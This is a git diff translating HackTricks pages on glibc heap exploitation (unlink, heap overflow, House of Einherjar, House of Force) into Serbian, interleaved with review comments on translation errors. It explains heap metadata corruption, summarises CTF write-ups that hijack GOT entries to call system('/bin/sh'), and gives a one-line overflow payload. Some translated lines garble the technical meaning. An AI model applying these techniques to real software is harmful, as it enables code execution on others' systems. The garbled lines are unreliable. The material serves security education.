*/ +assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0); +front_misalign = 0; +} +else +front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK; - mchunkptr p; /* the allocated/returned chunk */ +mchunkptr p; /* the allocated/returned chunk */ - if (front_misalign > 0) - { - ptrdiff_t correction = MALLOC_ALIGNMENT - front_misalign; - p = (mchunkptr) (mm + correction); - set_prev_size (p, correction); - set_head (p, (size - correction) | IS_MMAPPED); - } - else - { - p = (mchunkptr) mm; - set_prev_size (p, 0); - set_head (p, size | IS_MMAPPED); - } +if (front_misalign > 0) +{ +ptrdiff_t correction = MALLOC_ALIGNMENT - front_misalign; +p = (mchunkptr) (mm + correction); +set_prev_size (p, correction); +set_head (p, (size - correction) | IS_MMAPPED); +} +else +{ +p = (mchunkptr) mm; +set_prev_size (p, 0); +set_head (p, size | IS_MMAPPED); +} - /* update statistics */ - int new = atomic_fetch_add_relaxed (&mp_.n_mmaps, 1) + 1; - atomic_max (&mp_.max_n_mmaps, new); +/* update statistics */ +int new = atomic_fetch_add_relaxed (&mp_.n_mmaps, 1) + 1; +atomic_max (&mp_.max_n_mmaps, new); - unsigned long sum; - sum = atomic_fetch_add_relaxed (&mp_.mmapped_mem, size) + size; - atomic_max (&mp_.max_mmapped_mem, sum); +unsigned long sum; +sum = atomic_fetch_add_relaxed (&mp_.mmapped_mem, size) + size; +atomic_max (&mp_.max_mmapped_mem, sum); - check_chunk (av, p); +check_chunk (av, p); - return chunk2mem (p); +return chunk2mem (p); } ``` -
{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md index 7d26f6546..a6496c436 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md @@ -2,8 +2,7 @@ {{#include ../../../banners/hacktricks-training.md}} -### Code - +### Код ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c 
@@ -11,73 +10,72 @@ static void unlink_chunk (mstate av, mchunkptr p) { - if (chunksize (p) != prev_size (next_chunk (p))) - malloc_printerr ("corrupted size vs. prev_size"); +if (chunksize (p) != prev_size (next_chunk (p))) +malloc_printerr ("corrupted size vs. prev_size"); - mchunkptr fd = p->fd; - mchunkptr bk = p->bk; +mchunkptr fd = p->fd; +mchunkptr bk = p->bk; - if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) - malloc_printerr ("corrupted double-linked list"); +if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) +malloc_printerr ("corrupted double-linked list"); - fd->bk = bk; - bk->fd = fd; - if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL) - { - if (p->fd_nextsize->bk_nextsize != p - || p->bk_nextsize->fd_nextsize != p) - malloc_printerr ("corrupted double-linked list (not small)"); +fd->bk = bk; +bk->fd = fd; +if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL) +{ +if (p->fd_nextsize->bk_nextsize != p +|| p->bk_nextsize->fd_nextsize != p) +malloc_printerr ("corrupted double-linked list (not small)"); - // Added: If the FD is not in the nextsize list - if (fd->fd_nextsize == NULL) - { +// Added: If the FD is not in the nextsize list +if (fd->fd_nextsize == NULL) +{ - if (p->fd_nextsize == p) - fd->fd_nextsize = fd->bk_nextsize = fd; - else - // Link the nexsize list in when removing the new chunk - { - fd->fd_nextsize = p->fd_nextsize; - fd->bk_nextsize = p->bk_nextsize; - p->fd_nextsize->bk_nextsize = fd; - p->bk_nextsize->fd_nextsize = fd; - } - } - else - { - p->fd_nextsize->bk_nextsize = p->bk_nextsize; - p->bk_nextsize->fd_nextsize = p->fd_nextsize; - } - } +if (p->fd_nextsize == p) +fd->fd_nextsize = fd->bk_nextsize = fd; +else +// Link the nexsize list in when removing the new chunk +{ +fd->fd_nextsize = p->fd_nextsize; +fd->bk_nextsize = p->bk_nextsize; +p->fd_nextsize->bk_nextsize = fd; +p->bk_nextsize->fd_nextsize = fd; +} +} +else +{ +p->fd_nextsize->bk_nextsize = p->bk_nextsize; 
+p->bk_nextsize->fd_nextsize = p->fd_nextsize; +} +} } ``` +### Grafičko Objašnjenje -### Graphical Explanation - -Check this great graphical explanation of the unlink process: +Pogledajte ovo odlično grafičko objašnjenje procesa unlink:

https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/figure/unlink_smallbin_intro.png

-### Security Checks +### Provere Bezbednosti -- Check if the indicated size of the chunk is the same as the prev_size indicated in the next chunk -- Check also that `P->fd->bk == P` and `P->bk->fw == P` -- If the chunk is not small, check that `P->fd_nextsize->bk_nextsize == P` and `P->bk_nextsize->fd_nextsize == P` +- Proverite da li je naznačena veličina chunk-a ista kao prev_size naznačen u sledećem chunk-u +- Takođe proverite da `P->fd->bk == P` i `P->bk->fw == P` +- Ako chunk nije mali, proverite da `P->fd_nextsize->bk_nextsize == P` i `P->bk_nextsize->fd_nextsize == P` -### Leaks +### Curjenja -An unlinked chunk is not cleaning the allocated addreses, so having access to rad it, it's possible to leak some interesting addresses: +Unlinked chunk ne čisti alocirane adrese, tako da, imajući pristup rad, moguće je curiti neke zanimljive adrese: -Libc Leaks: +Libc curenja: -- If P is located in the head of the doubly linked list, `bk` will be pointing to `malloc_state` in libc -- If P is located at the end of the doubly linked list, `fd` will be pointing to `malloc_state` in libc -- When the doubly linked list contains only one free chunk, P is in the doubly linked list, and both `fd` and `bk` can leak the address inside `malloc_state`. +- Ako je P smešten u glavi dvostruko povezanog spiska, `bk` će pokazivati na `malloc_state` u libc +- Ako je P smešten na kraju dvostruko povezanog spiska, `fd` će pokazivati na `malloc_state` u libc +- Kada dvostruko povezani spisak sadrži samo jedan slobodan chunk, P je u dvostruko povezanom spisku, i `fd` i `bk` mogu curiti adresu unutar `malloc_state`. 
-Heap leaks: +Curjenja iz heap-a: -- If P is located in the head of the doubly linked list, `fd` will be pointing to an available chunk in the heap -- If P is located at the end of the doubly linked list, `bk` will be pointing to an available chunk in the heap -- If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap +- Ako je P smešten u glavi dvostruko povezanog spiska, `fd` će pokazivati na dostupni chunk u heap-u +- Ako je P smešten na kraju dvostruko povezanog spiska, `bk` će pokazivati na dostupni chunk u heap-u +- Ako je P u dvostruko povezanom spisku, i `fd` i `bk` će pokazivati na dostupni chunk u heap-u {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/heap-overflow.md b/src/binary-exploitation/libc-heap/heap-overflow.md index 24ea86a70..b18b1adfd 100644 --- a/src/binary-exploitation/libc-heap/heap-overflow.md +++ b/src/binary-exploitation/libc-heap/heap-overflow.md 
@@ -2,49 +2,47 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.** +Heap overflow je kao [**stack overflow**](../stack-overflow/) ali u heap-u. U suštini, to znači da je neki prostor rezervisan u heap-u za skladištenje podataka i **skladišteni podaci su bili veći od rezervisanog prostora.** -In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this. +U stack overflow-ima znamo da će neki registri kao što su pokazivač instrukcija ili stack frame biti vraćeni iz stack-a i to bi moglo biti moguće zloupotrebiti. U slučaju heap overflow-a, **nema osetljivih informacija koje se po defaultu čuvaju** u heap chunk-u koji može biti overflow-ovan. Međutim, to mogu biti osetljive informacije ili pokazivači, tako da **kritičnost** ove ranjivosti **zavisi** od **koji podaci mogu biti prepisani** i kako bi napadač mogao to zloupotrebiti. > [!TIP] -> In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets). +> Da biste pronašli offset-e overflow-a, možete koristiti iste obrasce kao u [**stack overflow-ima**](../stack-overflow/#finding-stack-overflows-offsets). 
-### Stack Overflows vs Heap Overflows +### Stack Overflow-i vs Heap Overflow-i -In stack overflows the arranging and data that is going to be present in the stack at the moment the vulnerability can be triggered is fairly reliable. This is because the stack is linear, always increasing in colliding memory, in **specific places of the program run the stack memory usually stores similar kind of data** and it has some specific structure with some pointers at the end of the stack part used by each function. +U stack overflow-ima, raspored i podaci koji će biti prisutni u stack-u u trenutku kada se ranjivost može aktivirati su prilično pouzdani. To je zato što je stack linearan, uvek se povećava u kolidirajućoj memoriji, u **specifičnim mestima izvršavanja programa stack memorija obično čuva slične vrste podataka** i ima neku specifičnu strukturu sa nekim pokazivačima na kraju dela stack-a koji koristi svaka funkcija. -However, in the case of a heap overflow, the used memory isn’t linear but **allocated chunks are usually in separated positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previous freed memory is used** before allocating new chunks. It’s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it’s needed to find a **reliable way to make the desired object to be next in memory** from the one that can be overflowed. +Međutim, u slučaju heap overflow-a, korišćena memorija nije linearna, već su **alokacije obično u odvojenim pozicijama memorije** (ne jedna pored druge) zbog **bins i zona** koje razdvajaju alokacije po veličini i zato što se **prethodno oslobođena memorija koristi** pre nego što se alociraju novi chunk-ovi. **Teško je znati koji objekat će se sudariti sa onim koji je ranjiv** na heap overflow. 
Dakle, kada se pronađe heap overflow, potrebno je pronaći **pouzdan način da se željeni objekat postavi pored u memoriji** onog koji može biti overflow-ovan. -One of the techniques used for this is **Heap Grooming** which is used for example [**in this post**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). In the post it’s explained how when in iOS kernel when a zone run out of memory to store chunks of memory, it expands it by a kernel page, and this page is splitted into chunks of the expected sizes which would be used in order (until iOS version 9.2, then these chunks are used in a randomised way to difficult the exploitation of these attacks). +Jedna od tehnika koja se koristi za ovo je **Heap Grooming** koja se koristi, na primer, [**u ovom postu**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). U postu se objašnjava kako kada u iOS kernel-u zona ponestane memorije za skladištenje chunk-ova, ona se širi za kernel stranicu, a ova stranica se deli na chunk-ove očekivanih veličina koji će se koristiti redom (do iOS verzije 9.2, zatim se ovi chunk-ovi koriste na nasumičan način kako bi se otežala eksploatacija ovih napada). -Therefore, in the previous post where a heap overflow is happening, in order to force the overflowed object to be colliding with a victim order, several **`kallocs` are forced by several threads to try to ensure that all the free chunks are filled and that a new page is created**. +Stoga, u prethodnom postu gde se dešava heap overflow, kako bi se primorao overflow-ovani objekat da se sudari sa objektom žrtvom, nekoliko **`kallocs` se primorava od strane nekoliko niti kako bi se pokušalo osigurati da su svi slobodni chunk-ovi popunjeni i da je stvorena nova stranica**. -In order to force this filling with objects of a specific size, the **out-of-line allocation associated with an iOS mach port** is an ideal candidate. 
By crafting the size of the message, it’s possible to exactly specify the size of `kalloc` allocation and when the corresponding mach port is destroyed, the corresponding allocation will be immediately released back to `kfree`. +Da bi se primoralo ovo popunjavanje objektima specifične veličine, **out-of-line alokacija povezana sa iOS mach port-om** je idealan kandidat. Prilagođavanjem veličine poruke, moguće je tačno odrediti veličinu `kalloc` alokacije i kada se odgovarajući mach port uništi, odgovarajuća alokacija će odmah biti vraćena nazad `kfree`. -Then, some of these placeholders can be **freed**. The **`kalloc.4096` free list releases elements in a last-in-first-out order**, which basically means that if some place holders are freed and the exploit try lo allocate several victim objects while trying to allocate the object vulnerable to overflow, it’s probable that this object will be followed by a victim object. +Zatim, neki od ovih mesta mogu biti **oslobođeni**. **`kalloc.4096` slobodna lista oslobađa elemente u redosledu poslednji ulaz, prvi izlaz**, što u suštini znači da ako su neka mesta oslobođena i eksploatacija pokušava da alocira nekoliko objekata žrtava dok pokušava da alocira objekat ranjiv na overflow, verovatno je da će ovaj objekat biti praćen objektom žrtvom. -### Example libc +### Primer libc -[**In this page**](https://guyinatuxedo.github.io/27-edit_free_chunk/heap_consolidation_explanation/index.html) it's possible to find a basic Heap overflow emulation that shows how overwriting the prev in use bit of the next chunk and the position of the prev size it's possible to **consolidate a used chunk** (by making it thing it's unused) and **then allocate it again** being able to overwrite data that is being used in a different pointer also. 
+[**Na ovoj stranici**](https://guyinatuxedo.github.io/27-edit_free_chunk/heap_consolidation_explanation/index.html) moguće je pronaći osnovnu emulaciju Heap overflow-a koja pokazuje kako prepisivanje prev in use bita sledećeg chunk-a i pozicije prev veličine omogućava **konzolidaciju korišćenog chunk-a** (praveći da misli da je neiskorišćen) i **zatim ponovo alocirati** omogućavajući prepisivanje podataka koji se koriste u drugom pokazivaču. -Another example from [**protostar heap 0**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap0/index.html) shows a very basic example of a CTF where a **heap overflow** can be abused to call the winner function to **get the flag**. +Još jedan primer iz [**protostar heap 0**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap0/index.html) pokazuje vrlo osnovan primer CTF-a gde se **heap overflow** može zloupotrebiti da pozove funkciju pobednika da **dobije zastavicu**. -In the [**protostar heap 1**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap1/index.html) example it's possible to see how abusing a buffer overflow it's possible to **overwrite in a near chunk an address** where **arbitrary data from the user** is going to be written to. +U [**protostar heap 1**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap1/index.html) primeru moguće je videti kako zloupotreba buffer overflow-a omogućava **prepisivanje u bliskom chunk-u adrese** gde će **arbitrarni podaci od korisnika** biti napisani. -### Example ARM64 - -In the page [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/](https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/) you can find a heap overflow example where a command that is going to be executed is stored in the following chunk from the overflowed chunk. 
So, it's possible to modify the executed command by overwriting it with an easy exploit such as: +### Primer ARM64 +Na stranici [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/](https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/) možete pronaći primer heap overflow-a gde je komanda koja će biti izvršena smeštena u sledećem chunk-u od overflow-ovanog chunk-a. Tako, moguće je modifikovati izvršenu komandu prepisivanjem sa lakim eksploatom kao: ```bash python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt ``` - -### Other examples +### Drugi primeri - [**Auth-or-out. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/auth-or-out/) - - We use an Integer Overflow vulnerability to get a Heap Overflow. - - We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution. +- Koristimo ranjivost Integer Overflow da bismo dobili Heap Overflow. +- Korumpiramo pokazivače na funkciju unutar `struct`-a prekomernog dela da postavimo funkciju kao što je `system` i dobijemo izvršenje koda. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/house-of-einherjar.md b/src/binary-exploitation/libc-heap/house-of-einherjar.md index 28c6fd437..617f856ed 100644 --- a/src/binary-exploitation/libc-heap/house-of-einherjar.md +++ b/src/binary-exploitation/libc-heap/house-of-einherjar.md 
@@ -2,48 +2,48 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -### Code +### Kod -- Check the example from [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c) -- Or the one from [https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation](https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation) (you might need to fill the tcache) +- Proverite primer sa [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c) +- Ili onaj sa [https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation](https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation) (možda ćete morati da popunite tcache) -### Goal +### Cilj -- The goal is to allocate memory in almost any specific address. +- Cilj je alocirati memoriju na gotovo bilo kojoj specifičnoj adresi. -### Requirements +### Zahtevi -- Create a fake chunk when we want to allocate a chunk: - - Set pointers to point to itself to bypass sanity checks -- One-byte overflow with a null byte from one chunk to the next one to modify the `PREV_INUSE` flag. -- Indicate in the `prev_size` of the off-by-null abused chunk the difference between itself and the fake chunk - - The fake chunk size must also have been set the same size to bypass sanity checks -- For constructing these chunks, you will need a heap leak. +- Kreirati lažni chunk kada želimo da alociramo chunk: +- Postaviti pokazivače da upućuju na sebe kako bi se zaobišle provere +- Overflow od jednog bajta sa null bajtom iz jednog chunca u sledeći kako bi se modifikovao `PREV_INUSE` flag. 
+- Naznačiti u `prev_size` lažnog chunca razliku između njega i lažnog chunca +- Veličina lažnog chunca takođe mora biti postavljena na istu veličinu kako bi se zaobišle provere +- Za konstrukciju ovih chunkova, biće vam potreban heap leak. -### Attack +### Napad -- `A` fake chunk is created inside a chunk controlled by the attacker pointing with `fd` and `bk` to the original chunk to bypass protections -- 2 other chunks (`B` and `C`) are allocated -- Abusing the off by one in the `B` one the `prev in use` bit is cleaned and the `prev_size` data is overwritten with the difference between the place where the `C` chunk is allocated, to the fake `A` chunk generated before - - This `prev_size` and the size in the fake chunk `A` must be the same to bypass checks. -- Then, the tcache is filled -- Then, `C` is freed so it consolidates with the fake chunk `A` -- Then, a new chunk `D` is created which will be starting in the fake `A` chunk and covering `B` chunk - - The house of Einherjar finishes here -- This can be continued with a fast bin attack or Tcache poisoning: - - Free `B` to add it to the fast bin / Tcache - - `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside) - - Then, 2 mallocs are done and the second one is going to be **allocating the target address** +- `A` lažni chunk se kreira unutar chunca koji kontroliše napadač, upućujući sa `fd` i `bk` na originalni chunk kako bi se zaštili +- Alociraju se 2 druga chunca (`B` i `C`) +- Zloupotrebljavajući off by one u `B`, `prev in use` bit se čisti i `prev_size` podaci se prepisuju sa razlikom između mesta gde je alociran `C` chunk, do lažnog `A` chunca generisanog pre +- Ovaj `prev_size` i veličina u lažnom chunku `A` moraju biti iste kako bi se zaobišle provere. 
+- Zatim, tcache se popunjava +- Zatim, `C` se oslobađa kako bi se konsolidovao sa lažnim chunkom `A` +- Zatim, kreira se novi chunk `D` koji će početi u lažnom `A` chunku i pokriti `B` chunk +- Kuća Einherjar se ovde završava +- Ovo se može nastaviti brzim bin napadom ili Tcache trovanjem: +- Oslobodite `B` da ga dodate u brzi bin / Tcache +- `B`'s `fd` se prepisuje tako da pokazuje na ciljnu adresu zloupotrebljavajući `D` chunk (jer sadrži `B` unutar) +- Zatim, vrše se 2 malloc-a i drugi će biti **alociranje ciljne adrese** -## References and other examples +## Reference i drugi primeri - [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c) - **CTF** [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_einherjar/#2016-seccon-tinypad**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_einherjar/#2016-seccon-tinypad) - - After freeing pointers their aren't nullified, so it's still possible to access their data. Therefore a chunk is placed in the unsorted bin and leaked the pointers it contains (libc leak) and then a new heap is places on the unsorted bin and leaked a heap address from the pointer it gets. +- Nakon oslobađanja pokazivača, oni nisu nullifikovani, tako da je još uvek moguće pristupiti njihovim podacima. Stoga se chunk postavlja u nesortirani bin i curi pokazivače koje sadrži (libc leak) i zatim se novi heap postavlja na nesortirani bin i curi adresu heap-a iz pokazivača koji dobija. - [**baby-talk. DiceCTF 2024**](https://7rocky.github.io/en/ctf/other/dicectf/baby-talk/) - - Null-byte overflow bug in `strtok`. - - Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive. +- Null-byte overflow greška u `strtok`. 
+- Koristite House of Einherjar da dobijete situaciju preklapanja chunkova i završite sa Tcache trovanjem kako biste dobili proizvoljnu write primitivu. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/house-of-force.md b/src/binary-exploitation/libc-heap/house-of-force.md index 7d4fb9247..ded048b17 100644 --- a/src/binary-exploitation/libc-heap/house-of-force.md +++ b/src/binary-exploitation/libc-heap/house-of-force.md 
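Review bot: two lines in this hunk invert or lose the meaning of the source. `+- Naznačiti u `prev_size` lažnog chunca razliku između njega i lažnog chunca` says to write into the `prev_size` of the fake chunk the distance between the fake chunk and itself; the English is "in the `prev_size` of the off-by-null abused chunk the difference between itself and the fake chunk", i.e. the `prev_size` of the chunk whose `PREV_INUSE` bit was just cleared (chunk `C` in the attack list). Suggest `Naznačiti u `prev_size` chunka pogođenog off-by-null greškom razliku između njega i lažnog chunka`. And `upućujući sa `fd` i `bk` na originalni chunk kako bi se zaštili` turns "to bypass protections" into "to protect themselves"; it should read `kako bi se zaobišle provere`, exactly as the requirements list in the same hunk already phrases it (`kako bi se zaobišle provere`). Consistency points in the same hunk: the technique is "Kuća Einherjar" in the attack list but "House of Einherjar" in the baby-talk bullet, so keep the English name throughout; keep `fast bin` rather than `brzi bin`; the English possessive survives in `+- `B`'s `fd` se prepisuje` (write `` `fd` chunka `B` ``); and the declension `chunca` should be `chunka`, as the hunk itself uses `chunkova`/`chunku` elsewhere.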
@@ -2,43 +2,41 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -### Code +### Kod -- This technique was patched ([**here**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) and produces this error: `malloc(): corrupted top size` - - You can try the [**code from here**](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) to test it if you want. +- Ova tehnika je zakrpljena ([**ovde**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) i proizvodi ovu grešku: `malloc(): corrupted top size` +- Možete probati [**kod odavde**](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) da ga testirate ako želite. -### Goal +### Cilj -- The goal of this attack is to be able to allocate a chunk in a specific address. +- Cilj ovog napada je da se omogući alokacija dela u specifičnoj adresi. -### Requirements +### Zahtevi -- An overflow that allows to overwrite the size of the top chunk header (e.g. -1). -- Be able to control the size of the heap allocation +- Overflow koji omogućava prepisivanje veličine zaglavlja gornjeg dela (npr. -1). +- Mogućnost kontrole veličine alokacije na heap-u. -### Attack +### Napad -If an attacker wants to allocate a chunk in the address P to overwrite a value here. He starts by overwriting the top chunk size with `-1` (maybe with an overflow). This ensures that malloc won't be using mmap for any allocation as the Top chunk will always have enough space. - -Then, calculate the distance between the address of the top chunk and the target space to allocate. This is because a malloc with that size will be performed in order to move the top chunk to that position. This is how the difference/size can be easily calculated: +Ako napadač želi da alocira deo na adresi P da bi prepisao vrednost ovde. 
Počinje prepisivanjem veličine gornjeg dela sa `-1` (možda uz pomoć overflow-a). Ovo osigurava da malloc neće koristiti mmap za bilo koju alokaciju jer će gornji deo uvek imati dovoljno prostora. +Zatim, izračunajte razdaljinu između adrese gornjeg dela i ciljnog prostora za alokaciju. To je zato što će se malloc sa tom veličinom izvršiti kako bi se gornji deo pomerio na tu poziciju. Ovako se razlika/veličina može lako izračunati: ```c // From https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c#L59C2-L67C5 /* - * The evil_size is calulcated as (nb is the number of bytes requested + space for metadata): - * new_top = old_top + nb - * nb = new_top - old_top - * req + 2sizeof(long) = new_top - old_top - * req = new_top - old_top - 2sizeof(long) - * req = target - 2sizeof(long) - old_top - 2sizeof(long) - * req = target - old_top - 4*sizeof(long) - */ +* The evil_size is calulcated as (nb is the number of bytes requested + space for metadata): +* new_top = old_top + nb +* nb = new_top - old_top +* req + 2sizeof(long) = new_top - old_top +* req = new_top - old_top - 2sizeof(long) +* req = target - 2sizeof(long) - old_top - 2sizeof(long) +* req = target - old_top - 4*sizeof(long) +*/ ``` - -Therefore, allocating a size of `target - old_top - 4*sizeof(long)` (the 4 longs are because of the metadata of the top chunk and of the new chunk when allocated) will move the top chunk to the address we want to overwrite.\ -Then, do another malloc to get a chunk at the target address. +Zato, alociranje veličine `target - old_top - 4*sizeof(long)` (4 long-a su zbog metapodataka gornjeg dela i novog dela kada se alocira) će pomeriti gornji deo na adresu koju želimo da prepišemo.\ +Zatim, uradite još jedan malloc da dobijete deo na ciljnoj adresi. ### References & Other Examples 
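Review bot: this hunk edits the inside of a fenced code block, which a translation commit should never touch: the leading ` * ` of every line of the C comment is stripped (`- * new_top = old_top + nb` becomes `+* new_top = old_top + nb`), so the block no longer matches the how2heap source it cites and the comment no longer reads as a conventional block comment. Restore the original indentation, or exclude fenced blocks from the translator. The typo `calulcated` inside the comment is inherited from the quoted how2heap source and should stay as it is. Also, the context line `### References & Other Examples` that closes this hunk is left in English while the equivalent heading in house-of-einherjar was translated in this same patch (`## Reference i drugi primeri`); translate it for consistency. Minor grammar: `alokacija dela u specifičnoj adresi` should be `na specifičnoj adresi`, and `deo na adresi P da bi prepisao vrednost ovde. Počinje prepisivanjem` reproduces a sentence fragment from the source ("If an attacker wants ... to overwrite a value here. He starts ..."); joining the two sentences in the translation would read better.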
@@ -48,17 +46,17 @@ Then, do another malloc to get a chunk at the target address. - [https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c) - [https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#hitcon-training-lab-11](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#hitcon-training-lab-11) - - The goal of this scenario is a ret2win where we need to modify the address of a function that is going to be called by the address of the ret2win function - - The binary has an overflow that can be abused to modify the top chunk size, which is modified to -1 or p64(0xffffffffffffffff) - - Then, it's calculated the address to the place where the pointer to overwrite exists, and the difference from the current position of the top chunk to there is alloced with `malloc` - - Finally a new chunk is alloced which will contain this desired target inside which is overwritten by the ret2win function +- Cilj ovog scenarija je ret2win gde treba da modifikujemo adresu funkcije koja će biti pozvana adresom ret2win funkcije +- Binarni fajl ima overflow koji se može iskoristiti za modifikaciju veličine gornjeg dela, koja se menja na -1 ili p64(0xffffffffffffffff) +- Zatim se izračunava adresa mesta gde se nalazi pokazivač koji treba prepisati, a razlika od trenutne pozicije gornjeg dela do tamo se alocira sa `malloc` +- Na kraju se alocira novi deo koji će sadržati ovu željenu metu unutar koje se prepisuje funkcija ret2win - [https://shift--crops-hatenablog-com.translate.goog/entry/2016/03/21/171249?\_x_tr_sl=es&\_x_tr_tl=en&\_x_tr_hl=en&\_x_tr_pto=wapp](https://shift--crops-hatenablog-com.translate.goog/entry/2016/03/21/171249?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) - - In the `Input your 
name:` there is an initial vulnerability that allows to leak an address from the heap - - Then in the `Org:` and `Host:` functionality its possible to fill the 64B of the `s` pointer when asked for the **org name**, which in the stack is followed by the address of v2, which is then followed by the indicated **host name**. As then, strcpy is going to be copying the contents of s to a chunk of size 64B, it's possible to **overwrite the size of the top chunk** with the data put inside the **host name**. - - Now that arbitrary write it possible, the `atoi`'s GOT was overwritten to the address of printf. the it as possible to leak the address of `IO_2_1_stderr` _with_ `%24$p`. And with this libc leak it was possible to overwrite `atoi`'s GOT again with the address to `system` and call it passing as param `/bin/sh` - - An alternative method [proposed in this other writeup](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#2016-bctf-bcloud), is to overwrite `free` with `puts`, and then add the address of `atoi@got`, in the pointer that will be later freed so it's leaked and with this leak overwrite again `atoi@got` with `system` and call it with `/bin/sh`. +- U `Input your name:` postoji inicijalna ranjivost koja omogućava curenje adrese iz heap-a +- Zatim u `Org:` i `Host:` funkcionalnosti moguće je popuniti 64B `s` pokazivača kada se traži **org name**, koji u steku sledi adresu v2, koja zatim sledi označenoj **host name**. Kako će strcpy kopirati sadržaj s u deo veličine 64B, moguće je **prepisati veličinu gornjeg dela** sa podacima stavljenim unutar **host name**. +- Sada kada je proizvoljno pisanje moguće, `atoi`-ov GOT je prepisan na adresu printf. tako je bilo moguće curiti adresu `IO_2_1_stderr` _sa_ `%24$p`. 
